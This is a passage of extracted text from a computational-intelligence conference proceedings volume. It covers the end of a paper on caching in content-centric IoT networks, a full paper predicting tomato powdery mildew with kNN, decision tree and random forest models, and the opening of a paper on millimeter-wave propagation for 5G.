Simulation duration 1050 STU (Simulation Time
Unit)

 
C DC(Ri ) Hop C j
Gain Rij = ×   (1)
Max(DC(Ri )) Hop I j

5 CS(Ri ) is already full, then the older content would be removed from cache space
using least frequently used (LFU) cache replacement strategy. Then, Ri forwards
the content towards requesters after caching decision using Eq. 2.

  C
True, if Gain Rij ≥ ψ
Cache Content Ri , C j = C (2)
False, if Gain Rij < ψ

For the optimal value of ψ, the performance of the proposed caching scheme
has been explored for different values of ψ in the ndnSIM simulation with param-
eters mentioned in Table 1. During executions, the optimal network performance
is obtained with ψ = 0.2, and therefore, this value is used during the simulations.
Although the configuration of the threshold parameter is relatively arbitrary for the
simulations and may change for other network topologies, it provides a good starting
point to explore the caching performance in the CCN-based IoT environment.

4 Performance Evaluation

The QoS delivered by proposed caching scheme is examined with several competing
peer strategies mentioned in the literature review section, which are DC-based
caching, LCE, Random-Prob(0.3) and FGPC caching mechanisms. The default cache
replacement strategy used with the peer schemes is least recently used (LRU). The
performance of the caching schemes has been compared on three parameters; cache
hit ratio, network hop-count and the latency (delay) in retrieving the requested
content.
504 S. Kumar et al.

(a) Cache hit-ratio with CS Ri =50 (b) Cache hit-ratio with CS Ri =100

Fig. 1 Cache hit ratio with α = 0.8, λ = 50/second and (|N|) = 5000

The average hit ratio is determined by considering the fraction of the total number
of cache-hitting operations and the requests encountered by the routers in per unit
time. Figure 1a shows the average network hit ratio when cache size of in-network
routers has been set to 50 contents. Initially, the caching schemes experienced lower
average hit ratio because network cache are empty in the beginning. With time, the
performance of the content placement strategies has been increased as routers begin
placements of forwarded contents as per the caching policies. During simulations, the
proposed scheme shows 4.3, 5.1, 4.8% and 5.0% improvement in the average cache
hit ratio from the DC-based, LCE, Prob(0.3) and FGPC caching strategies. When
cache size of the network routers is improved and assumed to be 100 contents per
router during simulation, the improvement in the hit ratio for each caching mechanism
is observed as shown in Fig. 1b. The results illustrate that the proposed mechanism
outperforms the peer schemes by demonstrating up-to 6.1% gain in the average hit
ratio.
The value of the hop-count metric for an Interest is determined by the summa-
tion of the number of hops traversed by the Interest message to reach the content
provider and by the corresponding content message during its delivery. Figure 2a
illustrates average network hop-count observed in the caching mechanisms after
assuming that the caching capacity of network routers is 50. In this scenario, proposed
scheme observes 13.1, 15.4, 14.5 and 14.2% drop in the average hop-count from the
DC-based, LCE, Prob(0.3) and the FGPC schemes. When caching capacity of the
intermediate routers increases to 100 contents, the proposed solution achieves up-to
16.6% drop in the average network hop-count from the peer competing schemes.
The value of average network delay is the time period from creation of Interest
message and the transportation of that content to requester. When caching capacity
of routers has been assumed to 50, the proposed strategy drops the average delay
up-to 14.5% from the existing schemes as shown in Fig. 3a. The analogous perfor-
mance gains are obtained by the proposed scheme when cache space of the routers
is increased to 100 where the proposed strategy decreases the average network delay
between 11 and 12.5% from the existing peer schemes as shown in Fig. 3b.
An Efficient Caching Approach … 505

(a) Average hop-count with CS Ri =50 (b) Average hop-count with CS Ri =100

Fig. 2 Average network hop-count with α = 0.8, λ = 50/second and (|N|) = 5000

(a) Average delay with Csize=50 (b) Average delay with Csize=100

Fig. 3 Average network delay (in micro-seconds) with α = 0.8, λ = 50/second and (|N|) = 5000

5 Conclusion

In this paper, a novel caching scheme has been proposed which is suitable for
the CCN-based IoT environment. The scheme jointly considers the node degree
centrality, hop-count metrics and LFU strategy for the content caching decisions.
The performance of the proposed caching scheme is compared with various state-
of-the-art schemes such as LCE, DC-based, Prob (0.3) and the FGPC. When the
ratio of CS(Ri ) and |N| is 1%, the proposed strategy achieves up-to 5.1% increase in
the average cache hit ratio and drop-off network hop-count and the delay up-to 15.4
and 14.5% from the peer caching schemes, respectively. Analogous performance
improvement is experienced when the cache space of the network routers is enlarged
to 100 contents (2% of |N|), and the proposed scheme shows significant performance
improvement from the competing strategies. Hence, the proposed scheme is suitable
for large-scale CCN-based IoT networks and their applications. In future, more char-
acteristics of the content and networks will be explored to improve the QoS under
dynamic network topologies.
506 S. Kumar et al.

References

1. Khan, E., Garg, D., Tiwari, R., & Upadhyay, S. (2018). Automated toll tax collection system
using cloud database. In 2018 3rd International Conference On Internet of Things: Smart
Innovation and Usages (IoT-SIU) (pp 1–5). IEEE.
2. Djama, A., Djamaa, B., & Senouci, M. R. (2020). Information-centric networking solutions
for the internet of things: a systematic mapping review. Computer Communications.
3. Din, I. U., Asmat, H., & Guizani, M. (2019). A review of information centric network based
internet of things: Communication architectures, design issues, and research opportunities.
Multimedia Tools and Applications, 78(21), 30241–30256.
4. Tiwari, R., & Kumar, N. (2016). An adaptive cache invalidation technique for wireless
environments. Telecommunication Systems, 62(1), 149–165.
5. Tiwari, R., & Kumar, N. (2015). Minimizing query delay using co-operation in ivanet. Procedia
Computer Science, 57, 84–90.
6. Arshad, S., Azam, M. A., Rehmani, M. H., & Loo, J. (2018). Recent advances in information-
centric networking-based internet of things (icn-iot). IEEE Internet of Things Journal, 6(2),
2128–2158.
7. Jacobson, V., Smetters, D. K., Thornton, J. D., Plass, M. F., Briggs, N. H., & Braynard, R.
L. (2009). Networking named content. In Proceedings of the 5th International Conference on
Emerging Networking Experiments and Technologies. Association for Computing Machinery,
New York, NY, USA, CoNEXT ’09 (pp. 1–12). https://doi.org/10.1145/1658939.1658941
8. Hail, M. A., Amadeo, M., Molinaro, A., & Fischer, S. (2015). Caching in named data networking
for the wireless internet of things. In 2015 International Conference on Recent Advances in
Internet of Things (RIoT ) (pp. 1–6). IEEE.
9. Jacobson, V., Mosko, M., Smetters, D., & Garcia-Luna-Aceves, J. (2007). Contentcentric
networking, whitepaper describing future assurable global networks (pp. 1–9). Palo Alto
Research Center, Inc.
10. Kumar, S., Tiwari, R., Obaidat, M.S., Kumar, N., Hsiao, K. F. (2020). Cpndd: Content placement
approach in content centric networking. In ICC 2020–2020. IEEE International Conference
on Communications (ICC) (pp. 1–6). IEEE.
11. Abdullahi, I., Arif, S., & Hassan, S. (2015). Survey on caching approaches in information
centric networking. Journal of Network and Computer Applications, 56, 48–59.
12. Tiwari R, Kumar N (2012) A novel hybrid approach for web caching. In 2012 Sixth International
Conference on Innovative Mobile and Internet Services in Ubiquitous Computing (pp. 512–
517). IEEE.
13. Tiwari, R., Sharma, H. K., Upadhyay, S., Sachan, S., & Sharma, A. (2019). Automated parking
system-cloud and iot based technique. International Journal of Engineering and Advanced
Technology (IJEAT), 8(4C), 116–123.
14. Naeem, M. A., Ali, R., Kim, B. S., Nor, S. A., & Hassan, S. (2018). A periodic caching strategy
solution for the smart city in information-centric internet of things. Sustainability, 10(7), 2576.
15. Arianfar, S., Nikander, P., Ott, J. (2010). On content-centric router design and implications.
In Proceedings of the Re-Architecting the Internet Workshop, Association for Computing
Machinery, New York, NY, USA, ReARCH ’10 (pp. 1–6). https://doi.org/10.1145/1921233.
1921240
16. Psaras, I., Chai, W. K., Pavlou, G. (2012). Probabilistic in-network caching for information-
centric networks. In Proceedings of the Second Edition of the ICN Workshop on Information-
Centric Networking (pp. 55–60).
17. Chai, W. K., He, D., Psaras, I., & Pavlou, G. (2013). Cache “less for more” in information-centric
networks (extended version). Computer Communications, 36(7), 758–770.
18. Kumar, S., Tiwari, R. (2020). An efficient content placement scheme based on normalized node
degree in content centric networking. Cluster Computing, 1–15.
19. Gao, Y., Zhou, J. (2019). Probabilistic caching mechanism based on software defined content
centric network. In 2019 IEEE 11th International Conference on Communication Software and
Networks (ICCSN) (pp. 210–214). IEEE.
An Efficient Caching Approach … 507

20. Ren, J., Qi, W., Westphal, C., Wang, J., Lu, K., Liu, S., & Wang, S. (2014). MAGIC: a distributed
MAx-gain in-network caching strategy in information centric networks. In 2014 IEEE Confer-
ence on Computer Communications Workshops (INFOCOM WKSHPS) (pp. 470–475). IEEE.
https://doi.org/10.1109/infcomw.2014.6849277
21. Ong, M. D., Chen, M., Taleb, T., Wang, X., & Leung, V. C. (2014). FGPC: fine-grained
popularity-based caching design for content centric networking. In Proceedings of the 17th
ACM International Conference on Modeling Analysis and Simulation of Wireless and Mobile
Systems—MSWiM ’14 (pp. 295–302). ACM Press. https://doi.org/10.1145/2641798.2641837
22. Kumar, S., & Tiwari, R. (2020). Optimized content centric networking for future internet:
dynamic popularity window based caching scheme. Computer Networks, 179, 107434.https://
doi.org/10.1016/j.comnet.2020.107434
23. Alderson, D., Li, L., Willinger, W., & Doyle, J. C. (2005). Understanding internet topology:
Principles models and validation. IEEE/ACM Transactions on Networking, 13(6), 1205–1218.
A Forecasting Technique for Powdery
Mildew Disease Prediction in Tomato
Plants

Anshul Bhatia, Anuradha Chug, Amit Prakash Singh, Ravinder Pal Singh,
and Dinesh Singh

Abstract In the current scenario, plant disease detection is seeking attention from
many agricultural scientists. Plant diseases are deeply influenced by the weather
conditions, and each disease has its individual weather requirements. The changes
in weather parameters such as humidity, temperature, wind speed, etc., can cause
many diseases in tomato plants. In the current empirical study, we have taken specific
disease powdery mildew whose fungus is named as Leveillula Taurica which belongs
to Leotiomycetes class, and it is responsible for the occurrence of this specific disease
in tomatoes. In this research, three weather-based prediction models have been devel-
oped using k-nearest neighbor (kNN), decision tree (DT), and random forest (RF)
algorithm for powdery mildew disease prediction in tomatoes at an early stage.
Results indicate that the proposed model, based on RF algorithm, shows the best
accuracy of 93.24% for tomato powdery mildew disease (TPMD) dataset. A real-
time version of the proposed model can be used by the agricultural experts to take
preventive measures in the most sensitive areas that are prone to powdery mildew
disease based on the weather conditions. Hence, timely intervention would help in
reducing the loss in productivity of tomato crops which will further benefit the global
economy, agricultural production, and the food industry.

Keywords Plant disease · Tomato · Random forest · Prediction · Decision tree ·


k-nearest neighbor

A. Bhatia (B) · A. Chug · A. P. Singh


University School of Information, Communication & Technology, Guru Gobind Singh
Indraprastha University, Dwarka, Sector-16 C, New Delhi 110078, India
e-mail: anshul.usict.127164@ipu.ac.in
A. Chug
e-mail: anuradha@ipu.ac.in
A. P. Singh
e-mail: amit@ipu.ac.in
R. P. Singh · D. Singh
Division of Plant Pathology, Indian Agricultural Research Institute (IARI), New Delhi, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 509
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_41
510 A. Bhatia et al.

1 Introduction

Tomato is one of the most consumable species of fruit whose yield and quality are
highly affected due to the rapidly changing weather conditions as well as global
warming. This crop suffers from various severe diseases, namely early blight, bacte-
rial leaf spot, leaf mold, powdery mildew, fusarium wilt, gray mold, late blight, and
many more. Powdery mildew is the most common fungal disease found in tomato
plants which is caused by a harmful pathogen named as Leveillula Taurica [1].
Changes in the climatic conditions can aggravate the risk of disease development in
the agricultural sector. A standardized range of weather conditions of a particular
area plays a crucial role in the productivity of any crop. However, any deviation
from the normal weather conditions may cause the risk of disease development in
the plant which can degrade its quality and productivity. Weather parameters such
as wind speed, global radiation, humidity, temperature, and leaf wetness are the
most critical factors, which are liable for the growth of powdery mildew disease in
tomato crop [2, 3]. Agricultural scientists have proposed a more prevalent approach,
i.e., image-based forecasting models for the prediction of tomato powdery mildew
disease [4–8] in the last decade, however, very few of them have worked on the
weather-based disease forecasting models [2, 9–12].
Many scientists have worked on tomato powdery mildew disease forecasting till
date, and few important studies are discussed here. Guzman-Plazola [9] proposed
a spray forecasting model for early prediction and prevention of powdery mildew
disease in tomato plants using a well-known machine learning approach, i.e., linear
discriminant analysis (LDA). He tested this model for two years between 1995 and
1996 on tomato fields of northern San Joaquin and southern Sacramento Valleys of
California. This model was capable of generating risk warnings and spray recom-
mendations based on the favorable weather conditions for the development of this
disease. In the year 2010, Ghaffari et al. [13] used various techniques based on artifi-
cial neural network (ANN) for the early detection of the same disease carried out in
current research. In one of the studies, Rumpf et al. [14] have applied the concept of
hyperspectral reflectance in conjunction with support vector machine (SVM) clas-
sifier for timely detection of powdery mildew. Further, Prince et al.[15] have also
contributed to this research by developing an image-based disease prediction model
by using SVM classifier. In the year 2015, Mokhtar et al. [16] also successfully
applied an SVM-based machine learning approach with Gabor wavelet transform
for disease detection. In one of the researches, Fuentes et al. [4] have also developed
disease prediction models by using various deep learning techniques and found that
the proposed models were efficient enough to identify the nine different types of pests
and tomato plant diseases including the complex scenarios of plants’ surrounding
areas. Authors have also built a mobile application using deep learning techniques
for many tomato plant disease’s predictions, and powdery mildew was also one of
them [5] which was using image as an input; whereas in the current research, we have
also tried to find out the best possible machine learning technique in order to develop
a forecasting model for powdery mildew disease detection in tomato plants using
A Forecasting Technique for Powdery Mildew Disease … 511

sensors data. Three machine learning techniques viz. k-nearest neighbor (kNN) [17],
decision tree (DT) [18], and random forest (RF) [19] are used to build the disease
prediction model. The performance of all the three models has been compared using
the most prominent accuracy metric which in turn helped to choose the best predic-
tion model. Results of this study can help the farmers as well as agricultural scientists
for early detection of this disease, and further, timely preventive measures can be
adopted in order to increase the quality of the crop.
The remaining paper is organized in the following manner: Sect. 2 highlights the
prior studies followed by research methodology in Sect. 3. Experimental results are
discussed in Sect. 4. Lastly, Sect. 5 summarizes the whole study with its future scope.

2 Literature Review

In literature, many researchers have proposed disease prediction models for various
plants. A few of them have been discussed in this section. In 2016, Saborl and
Kumar used the concept of DT to detect various tomato plant diseases. Their model
has achieved an accuracy of 76% [20]. Further, in 2018, Verma et al. published a
review paper on various disease prediction models based on machine learning and
image processing techniques [5]. In the next year, they developed a deep learning-
based android application for tomato disease prediction [8]. In 2020, Verma et al.
have also used the concept of capsule networks for potato disease diagnosis. Their
model was 91.83% accurate [7]. Further, in 2020, Bhatia et al. have used the concept
of extreme learning machine (ELM) algorithm with various resampling techniques to
detect powdery mildew disease in tomato plants [12]. They have achieved the predic-
tion accuracy of 89.91% in their study. In the same year, they have also proposed a
hybridized model for tomato powdery mildew disease prediction. There model was
92.37% accurate [10]. Again in 2020, Bhatia et al. also proposed a feature selection-
based approach for soybean disease diagnosis. Their technique has achieved an accu-
racy of 98.10% [11]. In the current study, we have also tried to develop a robust and
efficient technique for powdery mildew disease prediction in tomato plants.

3 Research Methodology

This section explains the overall methodology being followed in this paper with a
diagrammatic representation as shown in Fig. 1. Initially, tomato powdery mildew
disease (TPMD) dataset has been divided into 70% training and 30% testing data.
Further, three prediction models have been developed for TPMD dataset using kNN,
DT, and RF techniques. Lastly, on the basis of the performance measure metric, i.e.,
accuracy, the best model has been identified among the three prediction models
deployed in the current study. The proposed method has been implemented in
“RStudio Version 1.1.463.” The datasets have been elaborated in Sect. 3.1. Further,
512 A. Bhatia et al.

TPMD Dataset

Partitioning of Dataset into 70-30 Train-Test Ratio

Develop Prediction Model on Train-Set using Machine Learning Algorithms


i.e. DT, RF, and kNN

Validate/Test the Models on Test-Set

Comparative Analysis of Prediction Models using Accuracy Metric

Fig. 1 Block diagram of the proposed approach

an overview of kNN, DT, and RF algorithms has been provided in Sects. 3.2, 3.3
and 3.4, respectively. Lastly, Sect. 3.5 describes the performance metric used in this
study, i.e., the accuracy.

3.1 Dataset

A sensor-based time-series dataset, i.e., TPMD has been used in this study [2]. The
TPMD dataset provides information about the conduciveness of a particular day in
terms of tomato powdery mildew disease development based on various meteorolog-
ical parameters. These parameters include wind speed (WS), temperature (T), global
radiations (GR), relative humidity (RH), and leaf wetness (LW). The TPMD dataset
comprises of 244 observations, in which the above-mentioned meteorological param-
eters are considered as predictive (independent) variables and conduciveness/non-
conduciveness of a day is taken as response (dependent) variable. The dataset can
be access through the following link: https://bit.ly/2QQpNvW.

3.2 K-Nearest Neighbor (kNN)

kNN is a widely used supervised machine learning algorithm which uses the concept
of “close proximity (similar things are near to you)” to predict the class label of new
data point [17]. Let us assume that X is a training dataset which contains n number of
data points (X 1 ,X 2 …, Xn) and m number of attributes (a1 , a2 …, am ). Further, k is the
assumed integer value which indicates the number of nearest data points, and Y i is
A Forecasting Technique for Powdery Mildew Disease … 513

a test data point with equal number of attributes as training dataset. So, the working
of kNN can be understood with the help of following steps:
Step 1: Calculate the distance between the test data point, Y i and each row of the
train dataset X with the help of one of the distance functions, namely Manhattan or
Euclidean. Both of these function depends on Minkowski distance Formula which
calculates distance (D) between two variables U and V as shown in Eq. (1). In Eq. (1),
if p = 1, then it represents Manhattan distance, and if p = 2, then it shows Euclidean
distance.
 1/ p

n
D= |Ui − Vi | p
(1)
i=1

Step 2: Afterward, on the basis of the distance from test data point Y i , sort each
training sample (data point) in ascending order and store it in an array.
Step 3: Next, kNN algorithm will choose top k data points from the sorted array.
Step 4: Lastly, a class label will be assigned to the test data point on the basis of
the most frequent class of these k data points or the nearest neighbors.
The above algorithm can be explained with the help of an example. Suppose, in
Fig. 2, “circle” symbol represents the data samples belonging to the conducive class,
whereas the “star” symbol shows the data samples belonging to the non-conducive
class. Further, Q1 is the new sample to be classified and k = 3. Hence, kNN algorithm
will find three nearest neighbors of the respective new sample Q1 . It can be seen from
Fig. 2 that out of the three nearest neighbors, two belongs to the non-conducive class
that is why sample Q1 will be assigned to the non-conducive class.

: Conducive Class
Y-Axis (Relative Humidity)

: Non-Conducive Class

New sample Q1 is to be classified


k=3
?

X-Axis (Temperature)

Fig. 2 Example of kNN algorithm


514 A. Bhatia et al.

3.3 Decision Tree (DT)

DT is a well-known machine learning algorithm which was given by Quinlan [18] in


1986. It uses a tree-like structure in which every non-leaf node denotes an experiment
on an attribute, every branch signifies the result of the experiment, and every leaf or
terminal node shows the class label based on the result of the conducted experiment.
DT follows the divide and conquer approach. If “S” is a set of training data which
contains n number of classes (c1 , c2 …cn ), then the decision tree is constructed using
the given steps:
Step 1: If S contains samples of only one single class, then all those samples
belonging to S will be leaf nodes.
Step 2: If S contains samples of more than one class, then an experiment based
on some attribute aj of training data will be performed, and S will be divided into
subsets (S 1 , S 2 ,… S l ). Here l is the number of results obtained from the experiment
performed over the attribute aj .
Step 3: Step 2 will be repeatedly performed over each S i where 1 ≤ i ≤ l, until
each subset belongs to a single class.
During the decision tree construction, the best attribute for each node can be
selected using various criteria viz. gain ratio, gini index, information gain, etc.

3.4 Random Forest (RF)

RF is also a supervised machine learning algorithm which is a collection of a large


number of decision trees [19]. Each individual decision tree in RF predicts a class
label for a particular dataset, and the class with the highest number of votes turns out
to be the prediction of the RF model.
It is basically an ensemble method as shown in Fig. 3 and follows the given steps:
Step 1: Initially, a dataset splits into various random samples.
Step 2: Subsequently, a decision tree is constructed for each random sample.
Step 3: Further, each decision tree provides its individual prediction results.
Step 4: Lastly, the most frequent prediction becomes the final prediction of the
RF algorithm.

3.5 Performance Metric: Accuracy

Development of a prediction model is not worthy until it provides an accurate predic-


tion for the concerned problem domain. Therefore, performance evaluation of a
prediction model becomes a significant task for the researchers. Many such perfor-
mance metrics exist which have been used by various scientists, time to time in order
to evaluate the quality of the model. Accuracy is the most common performance
A Forecasting Technique for Powdery Mildew Disease … 515

Fig. 3 Block diagram of RF


algorithm Dataset

Random Random Random


Sample 1 Sample 2 Sample n

Decision Decision Decision


Tree 1 Tree 2 Tree n

Prediction Prediction Prediction

Counting of Majority Votes

Selection of the Most Frequent Prediction

metric, which is equal to the ratio between the number of accurate predictions made
by the classification model and the total number of predictions as shown in Eq. (2).
It can be calculated using a two-dimensional table known as the confusion matrix.
Figure 4 shows a sample confusion matrix.

Correctly Predicted Observations TP + TN


Accuracy = = (2)
Total Number of Observations TP + FP + TN + FN

There are some basic terms associated with any confusion matrix which are as
follows:
• The number of correctly identified instances that do not belong to the class (True
Negative (TN))

Fig. 4 Confusion matrix Actual

True Positive False Positive


Predicted

False Negative True Negative


516 A. Bhatia et al.

• The number of correctly identified instances that belong to the class (True Positive
(TP))
• The number of instances that were either incorrectly assigned to the class (False
Positive (FP)) or not identified as a class instance (False Negative (FN)

4 Results and Discussions

This section discusses the results of the experiment performed on the TPMD dataset.
Initially, the dataset was divided into 70–30 Train-Test ratio. After this, the Train-Set
was used for developing the prediction models for tomato powdery mildew disease
forecasting based on DT, kNN, and RF algorithms. Further, all the three trained
models were tested using Test-Set. Finally, a comparison of these models was made
with the help of the “Accuracy” metric for selecting a most suitable algorithm in
the present work. Figure 5 shows the confusion matrices for DT, kNN, and RF
algorithms. Based on these confusion matrices, the accuracy of DT, kNN, and RF
prediction model was calculated by putting the following values of TP, TN, FP, and
FN in Eq. (2):

DT− > TP = 10; TN = 56; FP = 8; F N = 0


Accuracy = (10 + 56)/(10 + 56 + 8 + 0) = 66/74 = 0.8919 = 89.19%
kNN− > TP = 12; TN = 56; FP = 6; FN = 0
Accuracy = (12 + 56)/(12 + 56 + 6 + 0) = 68/74 = 0.9189 = 91.89%
R F− > TP = 13; TN = 56; FP = 5; FN = 0
Accuracy = (13 + 56)/(13 + 56 + 5 + 0) = 69/74 = 0.9324 = 93.24%

Authors have observed that all the three algorithms, i.e., kNN, DT and RF
performed well with TPMD dataset because it can be seen that the accuracy lies
within the range of 89.19% to 93.24%, and it is considered as fairly well. Results
also indicate that the forecasting system based on RF performed the best among all
the three models with an accuracy of 93.24%, whereas DT-based model performed
the worst with 89.19% accuracy as shown in Fig. 6. Hence, it is fair to presume
that the proposed model can be efficiently used in the farming industry for early
prediction of powdery mildew disease detection in tomato plants.

4.1 Comparison with Previous Studies

The TPMD dataset was collected by Bakeer et al. in 2013 [2] to validate a disease
prediction model introduced by Guzman-Plazola in 1997 [9]. Further, in 2020, this
dataset was used by Bhatia et al. [12] for detection of powdery mildew disease
using extreme learning machine (ELM) algorithm. They have used four resampling
A Forecasting Technique for Powdery Mildew Disease … 517

(a) Confusion Matrix for DT algorithm (b) Confusion Matrix for kNN algorithm
Actual Actual
Conducive Non-Conducive Conducive Non-Conducive

Conducive
Conducive

10 8 12 6

Predicted
Predicted

Non-Conducive
Non-Conducive

0 56 0 56

(c) Confusion Matrix for RF algorithm


Actual
Conducive Non-Conducive
Conducive

13 5
Predicted
Non-Conducive

0 56

Fig. 5 Confusion matrices of DT, kNN, and RF algorithms

Performance Comparison
94.00%
93.00%
92.00%
Accuracy

91.00%
90.00%
89.00%
88.00%
87.00%
DT kNN RF
Accuracy 89.19% 91.89% 93.24%

Fig. 6 Performance comparison between DT, kNN and RF models


518 A. Bhatia et al.

Table 1 Comparison with


Techniques Accuracy (%)
previous studies
Proposed approaches
DT 89.19
kNN 91.89
RF 93.24
Existing approaches
IMPS-ELM [12] 89.91
Hybrid SVM-LR [10] 92.37

techniques, i.e., importance sampling (IMPS), synthetic minority over-sampling


(SMOTE), random under sampling (RUS), and random over sampling (ROS) to
balance the TPMD dataset. They have found that IMPS-ELM has performed the best
with an accuracy of 89.91%. In the same year, Bhatia et al. [10] have proposed a new
approach, namely hybrid SVM-logistic regression (LR) to detect tomato powdery
mildew disease. They have used TPMD dataset for their study. They have claimed
that their proposed model was 92.37% accurate. Table 1 shows an extensive compar-
ison of proposed approaches with the IMPS-ELM and hybrid SVM-LR algorithm.
It is evident from Table 1 that proposed RF algorithm performed better than both
of previous approaches. However, kNN has performed better than the IMPS-ELM
algorithm.

5 Conclusion and Future Scope

In the current study, authors have used three machine learning approaches, namely
kNN, DT, and RF to develop different disease prediction models, and it was found
that RF technique performed the best on TPMD dataset with 93.24% accuracy. Using
TPDM dataset, the proposed kNN, DT, and RF-based prediction models could predict
whether the meteorological conditions on a particular day are conducive for the
development of disease or not. If the model classifies a particular day as conducive,
then a warning may be sent to the farmer indicating the need to spray the fungicide
at that point of time. This way, the recommendations of the proposed models in
the current study can be used to reduce the unnecessary fungicide spray with no
significant impact on the yield and quality of the fruit. In future, we are planning
to develop a mobile-based application for the early detection of the tomato diseases
on the basis of weather conditions. Once the disease is diagnosed by the model,
this application will suggest the possible solutions through some communication
medium, which will in turn help the farmers to protect the tomato crop by timely
application of control measures. An online plant disease anticipator can also be made
which will give all the details about conducive weather conditions for a specific
A Forecasting Technique for Powdery Mildew Disease … 519

disease and also provide possible treatment as per the severity level of that particular
disease.

Acknowledgements This work is financially supported by the Department of Science and Tech-
nology (DST) under a project with reference number “DST/Reference.No.T-319/2018-19.” We are
grateful to them for their immense support.

References

1. Jones, W. B., & Thomson, S. V. (1987). Source of inoculum, yield, and quality of tomato as
affected by Leveillula taurica. Plant disease, 71(3), 266–268.
2. Bakeer, A. R. T., Abdel-Latef, M. A. E., Afifi, M. A., & Barakat, M. E. (2013). Validation of
tomato powdery mildew forecasting model using meteorological data in Egypt. International
Journal of Agriculture Sciences, 5(2), 372.
3. Verma, S., Bhatia, A., Chug, A., & Singh, A. P. (2020). Recent advancements in multimedia
big data computing for IoT applications in precision agriculture: opportunities, issues, and
challenges. In Multimedia big data computing for IoT applications (pp. 391–416). Springer,
Singapore.
4. Fuentes, A., Yoon, S., Kim, S. C., & Park, D. S. (2017). A robust deep-learning-based detector
for real-time tomato plant diseases and pests recognition. Sensors, 17(9), 2022.
5. Verma, S., Chug, A., & Singh, A. P (2018). Prediction models for identification and diag-
nosis of tomato plant diseases. In 2018 International Conference on Advances in Computing,
Communications and Informatics (ICACCI) (pp. 1557—1563).
6. Verma, S., Chug, A., & Singh, A. P. (2020). Application of convolutional neural networks for
evaluation of disease severity in tomato plant. Journal of Discrete Mathematical Sciences and
Cryptography, 23(1), 273–282.
7. Verma, S., Chug, A., & Singh, A. P. (2020). Exploring capsule networks for disease
classification in plants. Journal of Statistics and Management Systems, 23(2), 307–315.
8. Verma, S., Chug, A., Singh, A. P., Sharma, S., & Rajvanshi, P. (2019). Deep learning-based
mobile application for plant disease diagnosis: a proof of concept with a case study on tomato
plant. In Applications of image processing and soft computing systems in agriculture (pp. 242–
271). IGI Global.
9. Guzman-Plazola, R. A. (1997). Development of a spray forecast model for tomato powdery
mildew (Leveillula Taurica (Lev). Arn.). University of California, Davis.
10. Bhatia, A., Chug, A., & Singh, A. P. (2020). Hybrid SVM-LR classifier for powdery mildew
disease prediction in tomato plant. In 2020 7th International Conference on Signal Processing
and Integrated Networks (SPIN) (pp. 218–223). IEEE.
11. Bhatia, A., Chug, A., & Singh, A. P. (2020). Plant disease detection for high dimensional
imbalanced dataset using an enhanced decision tree approach. International Journal of Future
Generation Communication and Networking, 13(4), 71–78.
12. Bhatia, A., Chug, A., & Singh, A. P. (2020). Application of extreme learning machine in
plant disease prediction for highly imbalanced dataset. Journal of Statistics and Management
Systems, 23(6), 1059–1068. https://doi.org/10.1080/09720510.2020.1799504
13. Ghaffari, R., Zhang, F., Iliescu, D., Hines, E., Leeson, M., Napier, R., & Clarkson, J. (2010).
Early detection of diseases in tomato crops: an electronic nose and intelligent systems approach.
In The 2010 International Joint Conference on Neural Networks (IJCNN) (pp. 1–6). IEEE.
14. Rumpf, T., Mahlein, A.-K., Steiner, U., Oerke, E.-C., Dehne, H.-W., & Plümer, L. (2010).
Early detection and classification of plant diseases with support vector machines based on
hyperspectral reflectance. Computers and Electronics in Agriculture, 74(1), 91–99.
520 A. Bhatia et al.

15. Prince, G., Clarkson, J. P., & Rajpoot, N. M. (2015) Automatic detection diseases tomato
plants using thermal stereo visible light images. PLoS One, 10(4), e0123262.
16. Mokhtar, U., Ali, M. A. S., Hassenian, A. E., & Hefny, H. (2015). Tomato leaves diseases
detection approach based on support vector machines. In 2015 11th International Computer
Engineering Conference (ICENCO) (pp. 246–250). IEEE.
17. Vishwakarma, V. P., & Dalal, S. (2020). A novel non-linear modifier for adaptive illumination
normalization for robust face recognition. Multimedia Tools and Applications, 1–27.
18. Kotsiantis, S. B. (2013). Decision trees: A recent overview. Artificial Intelligence Review, 39(4),
261–283.
19. Liaw, A., & Wiener, M. (2002). Classification and regression by randomForest. R news, 2(3),
18–22.
20. Sabrol, H., & Kumar, S. (2016). Intensity based feature extraction for tomato plant disease
recognition by classification using decision tree. International Journal of Computer Science
and Information Security, 14(9), 622.
Investigate the Effect of Rain, Foliage,
Atmospheric Gases, and Diffraction
on Millimeter (mm) Wave Propagation
for 5G Cellular Networks

Animesh Tripathi, Pradeep K. Tiwari, Shiv Prakash, and N. K. Shukla

Abstract Technologies for wireless networking are rising increasingly to satisfy


increasing usage requirements. The burden on current wireless systems has increased
exponentially due to numerous mobile devices, multimedia applications with a high
data rate, audio and video streaming in high definition (HD) and the number of
users of wireless communication systems continues to increase. At the same time,
the usage of data per user has increased. This manifests in the steady growth of
wireless network systems to keep momentum with the growing demand for data rate.
Because of the growth in the number of customers, congestion in the conventional
cellular bands is also rising, so the use of EHF bands in communications is gaining
increasing interest. Millimeter-Wave (mm-Wave) bands are capable of delivering
broad bandwidth applications with multi-Gigabit rate, therefore, attracted significant
attention. The mm-Wave bands face few challenging issues. Walls can be breached
by low-frequency signals and protect very far ranges and, however, fly short distances
with mm-Waves and cannot pierce buildings and other things. This paper investigates
the propagation properties of millimeter waves and the effects of external influences,
such as rain, foliage, and diffraction of atmospheric gases. The main focus would be
to analyze the impact of these variables on the propagation of mm-Wave frequency.
Further, it also measures the damages due to gases in the atmosphere, rain, and foliage
at frequencies that are unlikely to be used in 5G cellular networks. Besides this,
we suggest a data-driven computational intelligence generic framework to optimize
quality of service (QoS) parameters such as bandwidth and path loss.

Keywords Millimeter-wave band · 5G cellular networks · Multi-gigabit rate

A. Tripathi (B) · P. K. Tiwari · S. Prakash · N. K. Shukla


Department of Electronics and Communication, UoA, Prayagraj, India
S. Prakash
e-mail: shivprakash@allduniv.ac.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 521
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_42
522 A. Tripathi et al.

1 Introduction and Related Work

To fulfill the challenges of a rising need for higher rates of data, larger network
infrastructure, and greater spectral efficiency, 5G cellular networks is introduced
recently. The data capacity is significantly improved via increasing the bandwidth of
the channel for different services to support high-speed Internet-based connectivity
